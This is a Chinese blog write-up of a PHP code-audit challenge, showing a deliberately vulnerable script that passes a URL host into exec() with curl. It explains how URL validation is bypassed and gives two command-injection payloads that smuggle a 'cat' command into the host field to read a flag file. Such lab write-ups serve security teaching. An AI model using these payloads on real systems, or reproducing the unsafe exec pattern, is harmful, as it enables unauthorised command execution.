银音铃
PHP代码审计Day2题解

题目来源先知社区红日安全中的day2
// index.php
 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "You have curl {$site_info['host']} successfully!
              "</span><span class="token punctuation">;</span>
        <span class="token keyword">echo</span> <span class="token function">implode</span><span class="token punctuation">(</span><span class="token single-quoted-string string">' '</span><span class="token punctuation">,</span> <span class="token variable">$result</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">else</span><span class="token punctuation">{</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"<center><h1>Error: Host not allowed</h1></center>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

<span class="token punctuation">}</span>
<span class="token keyword">else</span><span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">"<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token delimiter important">?></span>
</code></pre> 
  <pre><code class="prism language-php"><span class="token comment">// f1agi3hEre.php</span>
<span class="token delimiter important"><?php</span>  
<span class="token variable">$flag</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"HRCTF{f1lt3r_var_1s_s0_c00l}"</span>
<span class="token delimiter important">?></span>
</code></pre> 
  <p>解析：<br> get传参到url变量，然后进行filter_var()判断，如果返回true则进行下一步</p> 
  <blockquote> 
   <p>filter_var() 函数通过指定的过滤器过滤一个变量。 如果成功，则返回被过滤的数据。如果失败，则返回 FALSE。<br> FILTER_VALIDATE_URL：把值作为 URL 来验证。</p> 
  </blockquote> 
  <p>这里经过了filter_var的URL校验，parse_url的分割，preg_match正则<br> filter_var():要求传入参数符合url规定<br> parse_url():将URL解析成一个关联数组，无法解析返回false<br> preg_match:正则匹配了要求以sec-redclub.com结尾<br> exec():执行命令</p> 
  <p>既然要执行我们写的命令，又得是以sec-redclub.com结尾的url。</p> 
  <blockquote> 
   <p>用 & ? / @ # , ;具有分割url的作用</p> 
  </blockquote> 
  <p>构造url：</p> 
  <pre><code>?url=0://xxx.com;sec-redclub.com
</code></pre> 
  <p>此时 $site_info[‘host’]的值为<br> ‘host’ => string ‘xxx.com;sec-redclub.com’</p> 
  <p>可以在前面写入命令，绕过并且执行。接下来进行exec命令执行：</p> 
  <pre><code class="prism language-php"><span class="token function">exec</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'curl "'</span><span class="token punctuation">.</span><span class="token variable">$site_info</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'host'</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token single-quoted-string string">'"'</span><span class="token punctuation">,</span> <span class="token variable">$result</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>payload1：</p> 
  <pre><code>?url=0://%22;cat<flag.php;%22sec-redclub.com
</code></pre> 
  <p>此语句就是<br> curl " ";cat<flag.php;“sec-redclub.com”<br> 从而造成命令执行，此处cat后面的<号是为了绕过Filter()函数</p> 
  <p>payload2：</p> 
  <pre><code>?url=0://%22;cat<flag.php;%23;sec-redclub.com:80/
</code></pre> 
  <p>用#注释掉后面的双引号</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1277511348053360640"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(WEB安全,PHP代码审计)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1894970289519915008.htm"
                           title="[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)" target="_blank">[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)</a>
                        <span class="text-muted">_PowerShell</span>
<a class="tag" taget="_blank" href="/search/%5B/1.htm">[</a><a class="tag" taget="_blank" href="/search/%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98/1.htm">靶场实战</a><a class="tag" taget="_blank" href="/search/%5D/1.htm">]</a><a class="tag" taget="_blank" href="/search/vulhub/1.htm">vulhub</a><a class="tag" taget="_blank" href="/search/vulhub%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1.htm">vulhub漏洞复现</a><a class="tag" taget="_blank" href="/search/Apache/1.htm">Apache</a><a class="tag" taget="_blank" href="/search/Solr/1.htm">Solr</a><a class="tag" taget="_blank" href="/search/%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/1.htm">远程命令执行</a><a class="tag" taget="_blank" href="/search/CVE-2017-12629/1.htm">CVE-2017-12629</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>博主介绍‍博主介绍：大家好，我是_PowerShell，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯（一键三连）欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限，欢迎各位大佬指点，相互学习进步！文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629-RCE环境2、启动C</div>
                    </li>
                    <li><a href="/article/1894970288232263680.htm"
                           title="[ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228)" target="_blank">[ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228)</a>
                        <span class="text-muted">_PowerShell</span>
<a class="tag" taget="_blank" href="/search/%5B/1.htm">[</a><a class="tag" taget="_blank" href="/search/%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98/1.htm">靶场实战</a><a class="tag" taget="_blank" href="/search/%5D/1.htm">]</a><a class="tag" taget="_blank" href="/search/vulhub/1.htm">vulhub</a><a class="tag" taget="_blank" href="/search/CVE-2021-44228/1.htm">CVE-2021-44228</a><a class="tag" taget="_blank" href="/search/%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1.htm">远程代码执行漏洞</a><a class="tag" taget="_blank" href="/search/Apche/1.htm">Apche</a><a class="tag" taget="_blank" href="/search/log4j/1.htm">log4j</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>博主介绍‍博主介绍：大家好，我是_PowerShell，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯（一键三连）欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限，欢迎各位大佬指点，相互学习进步！文章目录博主介绍一、漏洞编号二、影响版本三、漏洞描述四、环境搭建1.进入CVE-2021-44228环境2.启动CVE-2</div>
                    </li>
                    <li><a href="/article/1894655928414826496.htm"
                           title="Web安全攻防入门教程——hvv行动详解" target="_blank">Web安全攻防入门教程——hvv行动详解</a>
                        <span class="text-muted">白帽子黑客罗哥</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a><a class="tag" taget="_blank" href="/search/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/1.htm">红蓝对抗</a>
                        <div>Web安全攻防入门教程Web安全攻防是指在Web应用程序的开发、部署和运行过程中，保护Web应用免受攻击和恶意行为的技术与策略。这个领域不仅涉及防御措施的实现，还包括通过渗透测试、漏洞挖掘和模拟攻击来识别潜在的安全问题。本教程将带你入门Web安全攻防的基础概念、常见攻击类型、防御技术以及一些实战方法。一、Web安全基础Web应用安全的三大核心目标（CIA三原则）机密性(Confidentialit</div>
                    </li>
                    <li><a href="/article/1894518880487927808.htm"
                           title="《白帽子讲Web安全》爬虫对抗：技术演进与攻防博弈" target="_blank">《白帽子讲Web安全》爬虫对抗：技术演进与攻防博弈</a>
                        <span class="text-muted">予安灵</span>
<a class="tag" taget="_blank" href="/search/%E7%99%BD%E5%B8%BD%E5%AD%90%E8%AE%B2Web%E5%AE%89%E5%85%A8/1.htm">白帽子讲Web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a>
                        <div>《白帽子讲Web安全》一书中，作者吴翰清和叶敏以技术深度与实战视角系统剖析了爬虫技术的演进与反爬虫对抗的核心逻辑。本文结合书中内容，从爬虫发展、行业挑战、反爬方案及对抗策略等维度总结核心观点。一、爬虫技术的发展与行业挑战1.爬虫的演进早期爬虫以简单脚本为主，通过模拟HTTP请求抓取公开数据；随着技术进步，现代爬虫已发展为具备分布式架构、动态渲染（如Headless浏览器）、AI辅助解析等能力的复杂</div>
                    </li>
                    <li><a href="/article/1894515222211784704.htm"
                           title="《白帽子讲Web安全》学习：深入解析Cookie与会话安全" target="_blank">《白帽子讲Web安全》学习：深入解析Cookie与会话安全</a>
                        <span class="text-muted">予安灵</span>
<a class="tag" taget="_blank" href="/search/%E7%99%BD%E5%B8%BD%E5%AD%90%E8%AE%B2Web%E5%AE%89%E5%85%A8/1.htm">白帽子讲Web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a><a class="tag" taget="_blank" href="/search/cookie/1.htm">cookie</a>
                        <div>目录导言一、Cookie的原理与作用二、Cookie面临的安全风险三、Cookie的核心安全属性1.Domain属性2.Path属性3.Expires属性4.HttpOnly属性5.Secure属性6.SameSite属性7.SameParty属性四、安全使用Cookie1.正确设置Cookie属性值2.Cookie前缀3.保密性和完整性五、会话安全1.会话管理（1）会话ID的随机性：（2）过期和</div>
                    </li>
                    <li><a href="/article/1893729268588933120.htm"
                           title="网络安全（黑客）——自学手册2024" target="_blank">网络安全（黑客）——自学手册2024</a>
                        <span class="text-muted">小言同学喜欢挖漏洞</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一</div>
                    </li>
                    <li><a href="/article/1893479128565346304.htm"
                           title="【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具" target="_blank">【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具</a>
                        <span class="text-muted">愚公搬代码</span>
<a class="tag" taget="_blank" href="/search/%E6%84%9A%E5%85%AC%E7%B3%BB%E5%88%97-%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E9%AB%98%E7%BA%A7%E7%8F%AD/1.htm">愚公系列-网络安全高级班</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>文章目录前言一、HW护网行动攻防演练1.蓝队1.1备战阶段1.2临战阶段1.3决战阶段1.4总结阶段2.红队2.1情报侦察阶段2.2外网打点阶段2.3内网渗透阶段二、工具箱1.红队1.1基础设施1.2渗透系统1.3信息搜集1.4Web安全1.5漏洞分析1.6渗透攻击1.7内网渗透1.8网络安全1.9无线安全1.10软件安全2.蓝队2.1威胁情报平台2.2漏洞情报平台2.3勒索病毒平台2.4网站安全</div>
                    </li>
                    <li><a href="/article/1893184667088121856.htm"
                           title="Web安全攻防入门教程——hvv行动详解" target="_blank">Web安全攻防入门教程——hvv行动详解</a>
                        <span class="text-muted">白帽子黑客罗哥</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>Web安全攻防入门教程Web安全攻防是指在Web应用程序的开发、部署和运行过程中，保护Web应用免受攻击和恶意行为的技术与策略。这个领域不仅涉及防御措施的实现，还包括通过渗透测试、漏洞挖掘和模拟攻击来识别潜在的安全问题。本教程将带你入门Web安全攻防的基础概念、常见攻击类型、防御技术以及一些实战方法。一、Web安全基础Web应用安全的三大核心目标（CIA三原则）机密性(Confidentialit</div>
                    </li>
                    <li><a href="/article/1893059564224442368.htm"
                           title="应用网关性能介绍" target="_blank">应用网关性能介绍</a>
                        <span class="text-muted">weixin_34409822</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/1.htm">操作系统</a><a class="tag" taget="_blank" href="/search/%E7%A1%AC%E4%BB%B6%E6%9E%B6%E6%9E%84/1.htm">硬件架构</a>
                        <div>随着网络技术的飞速发展与网络应用的不断拓展，单一功能的网关设备已经无法应对网络应用所带来的问题与挑战。于是有了集多种功能于一身的UTM产品，有了众多厂家最近不断推出的下一代安全网关，更有目前逐渐成为企业边界应用新宠的web安全网关（SecurewebGateway）。无论是UTM、下一代安全网关还是web安全网关，它们都具备了Internet应用安全防御和管控能力。面对种类繁多的应用安全网关，如何</div>
                    </li>
                    <li><a href="/article/1892853318309441536.htm"
                           title="【网络安全 | PHP代码审计】YXcms" target="_blank">【网络安全 | PHP代码审计】YXcms</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.htm">代码审计</a>
                        <div>原创文章，禁止转载。文章目录环境配置1.4.5版本安装1.2.1版本安装代码审计session伪造实现账户接管XSSGetshellXSS漏洞无回显SQL注入默认密钥下的SQL注入SQL显错注入未授权+代码执行任意文件删除1任意文件删除2YXcms是一款基于PHP+MySql开发的网站管理系统，采用轻量级MVC设计模式。环境配置1.4.5版本安装安装地址：https://github.com/cc</div>
                    </li>
                    <li><a href="/article/1892059160405667840.htm"
                           title="零基础被迫参加CTF比赛？CTF高频解题技巧与经验分享" target="_blank">零基础被迫参加CTF比赛？CTF高频解题技巧与经验分享</a>
                        <span class="text-muted">网络安全宇哥</span>
<a class="tag" taget="_blank" href="/search/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/1.htm">经验分享</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a>
                        <div>CTF（CaptureTheFlag）比赛中的高频解题技巧通常涵盖了以下几类技术，涉及从逆向工程、二进制漏洞利用到Web安全、密码学等多个领域。以下是一些高频解题技巧：1.逆向工程（ReverseEngineering）静态分析：通过阅读二进制文件的源代码或反编译代码（如使用IDAPro、Ghidra、Radare2）来理解程序的逻辑。检查程序的函数、字符串和常量，寻找可能的线索。动态调试：使用g</div>
                    </li>
                    <li><a href="/article/1891913254796587008.htm"
                           title="SQL注入技术详解与过滤绕过方法" target="_blank">SQL注入技术详解与过滤绕过方法</a>
                        <span class="text-muted">Cyc1e</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>SQL注入技术详解与过滤绕过方法1.什么是SQL注入？SQL注入（SQLInjection）是一种常见的Web安全漏洞，指攻击者将恶意的SQL代码插入到应用程序的输入字段中，并通过应用程序发送到数据库进行执行，进而对数据库进行未授权操作。其可能导致敏感数据泄露、篡改、删除等严重后果。1.1SQL注入的工作原理SQL注入的核心在于，攻击者通过操控输入字段，使服务器端的SQL查询语句发生意料之外的变化</div>
                    </li>
                    <li><a href="/article/1891489551076093952.htm"
                           title="WEB安全--SQL注入--POST传参注入、SQL头部注入" target="_blank">WEB安全--SQL注入--POST传参注入、SQL头部注入</a>
                        <span class="text-muted">神经毒素</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、介绍：post传参和get传参对注入方式没有本质上的影响，只不过前者是通过页面上的表单提交数据后者是通过url传参。而头部注入是因为后端并没有直接将参数插入查询语句，而是通过插入或取出cookie、referer等参数进行数据查询或更改的；所以通常使用抓包工具在抓到的数据包上更改相应的参数进行注入。二、示例：2.1、POST示例：#less-17username和password是两个传入点，</div>
                    </li>
                    <li><a href="/article/1891469368198492160.htm"
                           title="网络安全组织架构表 网络安全技术架构" target="_blank">网络安全组织架构表 网络安全技术架构</a>
                        <span class="text-muted">网络安全King</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>web安全架构（上）开始之前这们说一下，web网站其实防御也相当重要，不管是服务器防御，后台数据防御，数据库防御都是必须滴，那我们说说常见的几种。后续再给大家分享api接口安全性设计，黑名单白名单，以及防御DDOS。XSS攻击，SQL注入，防盗链，csrf模拟请求，文件上传漏洞，忘记密码漏洞，Api接口幂等，其他问题等等，，，，，，一，什么是XSS?Xss就是javascript脚本攻击，就是在表</div>
                    </li>
                    <li><a href="/article/1891364777222008832.htm"
                           title="WEB安全--SQL注入--floor报错注入" target="_blank">WEB安全--SQL注入--floor报错注入</a>
                        <span class="text-muted">神经毒素</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>一、原理：floor()报错注入需要组合count()、rand()、groupby()等函数使用，通过一些手段使数据库在处理语句时产生主键重复的报错，从而达到爆出信息的目的二、内容：?id=-1'or(select1from(selectcount(*),concat(database(),floor(rand(0)*2))xfrominformation_schema.tablesgroupb</div>
                    </li>
                    <li><a href="/article/1890537708615430144.htm"
                           title="《白帽子讲web安全》第二三章学习（HTTP，Web应用、浏览器安全）" target="_blank">《白帽子讲web安全》第二三章学习（HTTP，Web应用、浏览器安全）</a>
                        <span class="text-muted">此乃大忽悠</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>《白帽子讲web安全》第二三章学习HTTP协议简介HTTP请求HTTP响应WebSocketWeb服务器Web页面文档对象模型（DOM）JavaScript浏览器安全同源策略浏览器沙箱XSS保护隐私策略浏览器扩展高速发展的浏览器安全HTTP协议简介HTTP协议是一种Client-Server协议，所以只能由客户端单向发起请求，服务端再响应请求。这里的客户端也叫用户代理（UserAgent），在大多</div>
                    </li>
                    <li><a href="/article/1890476909784002560.htm"
                           title="2024年最新Web应用安全威胁与防护措施(3)" target="_blank">2024年最新Web应用安全威胁与防护措施(3)</a>
                        <span class="text-muted">2401_84240129</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>许多金融企业会让员工不受限地访问各类文档资源，他们甚至可以访问到本企业内部大约17%的敏感文件(约1100万个文件)。平均而言，只有5%的公司文件夹受到了适当的保护。而且，有超过77%的企业并无事件响应计划。可见，针对上述威胁，我们应采取主动的Web安全策略，以及严格的措施，来确保敏感的数据信息、Web应用、以及信息系统等资产，免受攻击与侵害。下面，我将和您讨论五种最主要的Web应用安全威胁，以及</div>
                    </li>
                    <li><a href="/article/1890390400808579072.htm"
                           title="Web安全攻防：渗透测试实战指南(徐焱)(Z-Library)" target="_blank">Web安全攻防：渗透测试实战指南(徐焱)(Z-Library)</a>
                        <span class="text-muted">快乐的红中</span>
<a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>目录作者简介······目录······《Web安全攻防：渗透测试实战指南》由浅入深、全面、系统地介绍了当前流行的高危漏洞的攻击手段和防御方法，并力求语言通俗易懂，举例简单明了，便于读者阅读、领会。结合具体案例进行讲解，可以让读者身临其境，快速地了解和掌握主流的漏洞利用技术与渗透测试技巧。阅读《Web安全攻防：渗透测试实战指南》不要求读者具备渗透测试的相关背景，如有相关经验在理解时会更有帮助。《W</div>
                    </li>
                    <li><a href="/article/1890263301821100032.htm"
                           title="Web 学习笔记 - 网络安全" target="_blank">Web 学习笔记 - 网络安全</a>
                        <span class="text-muted">网络安全Max</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>前言作为前端开发者，了解一点Web安全方面的基本知识是有很必要的，未必就要深入理解。本文主要介绍常见的网络攻击类型，不作深入探讨。正文网络攻击的形式种类繁多，从简单的网站敏感文件扫描、弱口令暴力破解，到SQL注入，再到复杂的网络劫持等，种类万千。本文只介绍以下两种攻击：XSS攻击CSRF攻击如果你对其他更高大上的网络攻击有兴趣，可以点击这里：Web安全学习笔记-高级网络攻击。XSS攻击XSS，跨站</div>
                    </li>
                    <li><a href="/article/1889832156629364736.htm"
                           title="HTTP协议系列----------- HTTP协议相关的Web安全问题" target="_blank">HTTP协议系列----------- HTTP协议相关的Web安全问题</a>
                        <span class="text-muted">FreeQuantum</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80/1.htm">网络基础</a><a class="tag" taget="_blank" href="/search/http%E5%8D%8F%E8%AE%AE/1.htm">http协议</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、确保Web安全的HTTPS二、确认访问用户身份的认证三、Web的攻击技术四、基于HTTP的功能追加协议</div>
                    </li>
                    <li><a href="/article/1889827239764226048.htm"
                           title="web安全HTTP协议基础" target="_blank">web安全HTTP协议基础</a>
                        <span class="text-muted">飞飞鱼_</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a>
                        <div>1、HTTP方法请求方法描述GET请求获取URL资源POST执行操作，请求URL资源后附加新的数据HEAD只获取资源响应消息的报头PUT请求服务器存储一个资源DELETE请求服务器删除资源TRACE请求服务器回送到的信息OPTIONS查询服务器的支持选项2、URL常见URL格式：protocol://[user[:password]@]hostname[:post]/[path]/file[?pa</div>
                    </li>
                    <li><a href="/article/1889218256959500288.htm"
                           title="网络安全 | 什么是XSS跨站脚本攻击？" target="_blank">网络安全 | 什么是XSS跨站脚本攻击？</a>
                        <span class="text-muted">Andya_net</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E6%9C%AF/1.htm">网络安全技术</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>关注：CodingTechWorkXSS介绍  XSS（Cross-SiteScripting）即跨站脚本攻击，是一种常见的Web安全漏洞。攻击者通过将恶意脚本嵌入到Web页面中，当用户访问该页面时，脚本就会在用户的浏览器中执行，从而窃取用户数据、篡改页面内容、或执行其他恶意操作。  XSS攻击主要依赖于Web应用没有对用户输入进行有效的过滤与校验，允许攻击者将恶意代码插入到网页中。这类攻击主要有</div>
                    </li>
                    <li><a href="/article/1889147785077387264.htm"
                           title="2025年黑客（网络安全）技术自学——高效学习" target="_blank">2025年黑客（网络安全）技术自学——高效学习</a>
                        <span class="text-muted">程序员羊羊</span>
